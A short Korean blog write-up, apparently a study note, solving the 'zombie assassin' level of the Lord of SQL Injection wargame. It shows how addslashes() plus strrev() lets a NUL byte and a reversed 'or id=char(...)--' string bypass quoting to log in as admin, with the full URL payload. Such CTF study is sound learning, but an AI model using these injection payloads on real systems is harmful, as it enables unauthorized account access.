보안 공부/Load of SQL injection
[Load of SQL Injection] zombie assassin
sh1256
2022. 1. 30. 00:16
728x90
1. strrev()
문자열을 입력받아서 순서를 뒤집은 상태로 리턴하는 함수
strrev('123456') --> '654321'
2. 필터링 문자들
prob _ . ()
이전 문제를 다시 사용하면 될 거 같다. 이전글 --> https://sh1256.tistory.com/72
[Load of SQL Injection] succubus
1. 필터링 prob _ . () 처음에 \(\)를 \\뜻으로 보고 1시간 넘게 못 풀었던...ㅜㅠ 이런 실수는 하지 맙시다 ㅎ 더보기 where id='\' and pw='or 1#' --> where id='\' and pw='or 1 # ' --> 특수문자 앞에 '\'를..
sh1256.tistory.com
3. strrev()와 addslashes()를 고려해서 id와 pw를 만들어 주기
**addslashes()는 작은따옴표('), 큰따옴표("), 백슬래시(\), NULL 문자(%00) 앞에 백슬래시(\)를 붙인다.
더보기
id=%00
pw= --)011,501,901,001,79(rahc=di ro
----addslashes()후---
id=\%00
pw= --)011,501,901,001,79(rahc=di ro
----strrev()후---
id=%00\
pw=or id=char(97,100,109,105,110)--
위의 식으로 진행된다.
따라서,
URL + ?id=%00&&pw= --)011,501,901,001,79(rahc=di ro
입력하면 성공!